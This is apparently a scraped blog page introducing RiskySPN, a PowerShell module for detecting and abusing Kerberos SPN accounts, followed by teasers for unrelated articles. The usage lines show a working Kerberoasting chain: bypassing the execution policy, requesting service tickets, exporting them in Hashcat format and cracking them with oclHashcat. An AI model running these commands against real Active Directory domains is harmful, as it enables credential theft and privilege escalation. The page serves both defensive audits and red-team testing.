RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.
Import-Module .\RiskySPNs.psm1
IEX
from the web). .\Find-PotentiallyCrackableAccounts.ps1
Make sure Set-ExecutionPolicy
is Unrestricted
or Bypass
Get-Help Get-TGSCipher -Full
All functions also have the -Verbose
mode
Find-PotentiallyCrackableAccounts
Sensitive + RC4 = $$$
Export-PotentiallyCrackableAccounts
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3
Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…
Docker is one of the most widely used containerization platforms. But there may come a…
Introduction Google Dorking is a technique where advanced search operators are used to uncover information…
Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…
What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…
Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…